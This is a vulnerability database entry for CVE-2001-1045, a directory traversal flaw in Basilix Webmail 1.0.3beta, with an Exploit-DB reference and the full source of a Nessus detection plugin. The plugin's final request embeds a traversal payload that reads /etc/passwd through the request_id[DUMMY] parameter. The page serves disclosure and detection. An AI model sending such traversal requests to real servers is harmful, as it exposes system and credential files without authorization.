Vulnerabilities > CVE-2001-1045 - Unspecified vulnerability in Basilix Webmail 1.02Beta/1.03Beta

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
basilix
nessus
exploit available

Summary

Directory traversal vulnerability in basilix.php3 in Basilix Webmail 1.0.3beta and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the request_id[DUMMY] parameter.

Vulnerable Configurations

Part Description Count
Application
Basilix
2

Exploit-Db

descriptionBasilix Webmail 1.0 File Disclosure Vulnerability. CVE-2001-1045. Webapps exploit for php platform
idEDB-ID:20996
last seen2016-02-02
modified2001-07-06
published2001-07-06
reporterkarol _
sourcehttps://www.exploit-db.com/download/20996/
titleBasilix Webmail 1.0 File Disclosure Vulnerability

Nessus

NASL familyCGI abuses
NASL idBASILIX_WEBMAIL.NASL
descriptionThe script
last seen2020-06-01
modified2020-06-02
plugin id11072
published2002-08-14
reporterThis script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/11072
titleBasilix Webmail basilix.php3 request_id[DUMMY] Variable Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#
# References:
# From: "karol _" <[email protected]>
# To: [email protected]
# CC: [email protected]
# Date: Fri, 06 Jul 2001 21:04:55 +0200
# Subject: basilix bug
#

include("compat.inc");

if (description)
{
 script_id(11072);
 script_version("1.26");
 script_cvs_date("Date: 2018/11/15 20:50:16");

 script_cve_id("CVE-2001-1045");
 script_bugtraq_id(2995);

 script_name(english:"Basilix Webmail basilix.php3 request_id[DUMMY] Variable Traversal Arbitrary File Access");
 script_summary(english:"Checks for the presence of basilix.php3");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is prone to a remote
file include attack.");
 script_set_attribute(attribute:"description", value:
"The script 'basilix.php3' is installed on the remote web server. Some
versions of this webmail software allow the users to read any file on
the system with the permission of the webmail software, and execute
any PHP.");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2001/Jul/114");
 script_set_attribute(attribute:"solution", value:"Update Basilix or remove DUMMY from lang.inc.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:W/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"2001/07/06");
 script_set_attribute(attribute:"plugin_publication_date", value:"2002/08/14");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_GATHER_INFO);

 script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");

 script_dependencies("http_version.nasl", "logins.nasl");
 script_require_keys("imap/login", "imap/password", "Settings/ParanoidReport", "www/PHP");
 script_require_ports("Services/www", 80);

 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);


port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);

user = get_kb_item("imap/login");
pass = get_kb_item("imap/password");
if (!user || !pass)
  exit(1, "imap/login and/or imap/password are empty");


url=string("/basilix.php3?request_id[DUMMY]=../../../../../../../../../etc/passwd&RequestID=DUMMY&username=", user, "&password=", pass);
if(is_cgi_installed3(port:port, item:url)){ security_hole(port); exit(0); }